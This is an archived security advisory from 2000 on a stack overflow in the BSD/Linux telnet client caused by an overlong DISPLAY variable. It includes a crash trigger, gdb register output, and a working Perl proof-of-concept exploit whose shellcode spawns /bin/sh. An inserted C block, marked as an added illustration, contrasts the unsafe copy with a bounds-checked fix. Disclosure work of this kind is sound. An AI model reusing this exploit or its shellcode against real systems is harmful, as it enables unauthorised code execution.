
tco.txt

22 Sep 2000 00:00:00, reported by synnergy. Type: packetstorm. Source: packetstormsecurity.com

A bug in the BSD/Linux telnet client leads to a stack overflow when the DISPLAY environment variable is overlong.

Code
Synnergy Laboratories Advisory SLA-2000-14  
  
NAME  
  
BSD/Linux telnet client overflow   
  
AFFECTED  
  
Linux  
Debian  
Redhat  
Mandrake  
Slackware  
[ possibly others ]  
  
BSD  
FreeBSD  
[ possibly others ]  
  
  
SYNOPSIS  
  
Synnergy Labs has found a bug in the telnet client that causes a stack  
overflow when the DISPLAY environment variable is filled with approximately 1000-3000  
bytes, allowing possible code execution to take place.  
  
  
DESCRIPTION  
  
Synnergy has recently discovered a trivial bug in the BSD/Linux telnet client  
that overwrites the EIP register on the stack. From a security point of view  
this bug would not cause much of a problem in general, since the telnet client  
does not run with elevated privileges. There are, though, *possible* scenarios  
in which this bug matters. Such a case was provided by the FreeBSD  
security admin, who said:  
  
"a non-shell service providing environment, where users are not intended to  
be able to execute arbitrary code, but can set environmental variables  
(i.e., a telnet-in old-style BBS with a telnet-out function). My suspicion is  
that if you have an environment like this, many base system tools suffer from  
this limitation"  
  
Other possible scenarios would be a restricted shell in a role-playing game,  
or a message board system within the shell. Both situations allow the user  
to edit the environment variables manually, which is the reason for this advisory.  
Since the DISPLAY environment variable is passed through telnetd, an account  
without a password that runs telnet could be exploited.  
  
The bug is triggered by setting the DISPLAY environment variable to around 1000 bytes,  
though the exact size varies from distribution to distribution; Redhat segfaulted  
at around 2000.  
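As an added illustration (not code from the advisory or from any telnet client source), the pattern the advisory describes is an unbounded copy of DISPLAY into a fixed-size stack buffer; the buffer size `DISPLAY_MAX`, the function names and the 'A'-filled input below are constructed, and the hardened variant refuses any value that does not fit rather than writing past the buffer:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed buffer size; the real client's buffer size is not on the page. */
#define DISPLAY_MAX 256

/* The bug pattern the advisory describes ("before"): DISPLAY is copied into a
 * fixed-size stack buffer with no length check, so a 1000-3000 byte value runs
 * past the buffer and over the saved EBP/EIP, as the advisory's gdb dump shows.
 * Kept only for comparison; nothing below calls it. */
void copy_display_unsafe(const char *display, char out[DISPLAY_MAX]) {
    strcpy(out, display);
}

/* Hardened variant: refuse any value that does not fit, terminator included,
 * so no byte is ever written past out[outsz - 1]. */
int copy_display_safe(const char *display, char *out, size_t outsz) {
    if (display == NULL || out == NULL || outsz == 0) return -1;
    /* memchr stops at the first NUL, so it reads at most outsz bytes. */
    const char *nul = memchr(display, '\0', outsz);
    if (nul == NULL) return -1;          /* no terminator within outsz: too long */
    size_t len = (size_t)(nul - display);
    memcpy(out, display, len + 1);       /* copies the terminator as well */
    return 0;
}

/* Reproduces the advisory's trigger in-process: a DISPLAY of n 'A' bytes
 * (constructed input). Returns 0 if the hardened copy accepted it, -1 if
 * it rejected it. */
int check_display_len(size_t n) {
    char *display = malloc(n + 1);
    if (display == NULL) return -1;
    memset(display, 'A', n);
    display[n] = '\0';
    char buf[DISPLAY_MAX];
    int rc = copy_display_safe(display, buf, sizeof buf);
    free(display);
    return rc;
}

int main(void) {
    /* The advisory's 1000-byte value is rejected; a normal value fits. */
    printf("1000 bytes: %s\n", check_display_len(1000) == 0 ? "accepted" : "rejected");
    printf("13 bytes:   %s\n", check_display_len(13) == 0 ? "accepted" : "rejected");
    return 0;
}
```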
  
Example:   
  
[ dethy@syn ] $ export DISPLAY=`perl -e 'print "A"x1000'`  
[ dethy@syn ] $ telnet localhost  
  
Trying 127.0.0.1...  
Connected to localhost.  
Escape character is '^]'.  
Segmentation fault (core dumped)  
  
Now loading up gdb, we see the following:  
#0 0x41414141 in ?? ()  
(gdb) info all-registers  
eax 0xbfbfd672 -1077946766  
ecx 0x3e 62  
edx 0x80574d0 134575312   
ebx 0xf0 240  
esp 0xbfbfd6e8 0xbfbfd6e8  
ebp 0x41414141 0x41414141  
esi 0xc 12  
edi 0xf 15  
eip 0x41414141 0x41414141  
eflags 0x10246 66118  
  
..a successful hit! EIP and EBP were overwritten, thus arbitrary code could  
be spawned, but a shell is good enough for us. :)  
  
Below is a proof of concept exploit that demonstrates the overflow by spawning  
a shell through telnet, once the environment variable has been set.  
  
#!/usr/bin/perl  
# Generic exploit program in perl, which clears the environment to take  
# away the need for offset guessing.  
# Dvorak (@synnergy.net // @hit2000.org) 1999.  
  
$egg = "\x90" x 1500;  
$egg .= "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76";  
$egg .= "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b";  
$egg .= "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff";  
$egg .= "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff";  
$egg .= "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02";  
$egg .= "\x02\x02\x02/bin/sh.-c.sh";  
  
foreach $key (keys %ENV) {  
    delete $ENV{$key};  
}  
  
# change the size of $buf if you need to.  
  
$buf="";  
for ($i = 0; $i < 256; $i++) {  
    $buf .= "\x01\xda\xbf\xbf";  
}  
  
# Put here your use for $buf, the string to exploit the vulnerable program with  
  
$ENV{"DISPLAY"} = $buf;  
$ENV{"egg"} = $egg;  
system("/usr/bin/telnet localhost");  
  
printf("Exploit done\n");  
  
  
SOLUTION  
  
I have contacted the FreeBSD security admin, and he is working on his own advisory.  
I would like to thank Rob Watson for his promptness.  
Other distributions should come out with their advisories soon.  
  
  
AUTHOR  
  
Advisory : dethy @ synnergy.net  
Discovery: hf @ synnergy.net  
Exploit : dvorak @ synnergy.net  
  
  
DISCLAIMER  
  
Synnergy Laboratories may not be held liable for the use or potential  
effects of these programs or advisories, nor the content contained  
within. Use them at your own risk.  
  
COPYRIGHT  
  
Synnergy Laboratories - www.synnergy.net (c) 1998-2000   
  
  
